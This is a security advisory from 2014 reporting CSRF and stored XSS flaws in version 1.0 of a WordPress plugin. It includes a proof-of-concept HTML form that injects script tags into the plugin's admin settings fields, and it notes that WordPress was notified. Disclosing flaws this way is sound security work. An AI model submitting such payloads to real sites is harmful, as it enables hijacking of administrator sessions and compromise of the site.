WordPress Sliding Recent Posts 1.0 CSRF / XSS

`Title: WordPress 'Sliding Recent Posts' plugin - CSRF/XSS  
Version: 1.0  
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej  
Date: 2014/12/12  
Download: https://wordpress.org/plugins/sliding-recent-posts/  
Notified WordPress: 2014/11/27  
----------------------------------------------------------------  
  
## Description:   
----------------------------------------------------------------  
This plugin displays a widget on your site that will slide into the screen when you click on it and it will display a list of recent posts with thumbnails  
  
## CSRF:  
----------------------------------------------------------------  
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.   
  
  
## Stored XSS:  
----------------------------------------------------------------  
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.   
  
PoC:  
Log in as admin and then submit the following form.   
<form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=sliding-recent-posts.php">   
<input type="text" name="num_posts" value="3"><br />  
<input type="text" name="position" value=""><script>alert(1)</script>"><br />  
<input type="text" name="background_color" value="#798746"/><script>alert(2)</script>"><br />  
<input type="text" name="font_color" value="#ffffff"><br />   
<input type="text" name="ll__opt[disable]" value="Save"><br />   
<input type="text" name="srp_save" value="save"><br />   
<input type="submit">  
</form>  
  
  
## Solution  
----------------------------------------------------------------  
No fix have been released.   
  
WordPress have been notified and the plugin has been closed until it is updated.  
`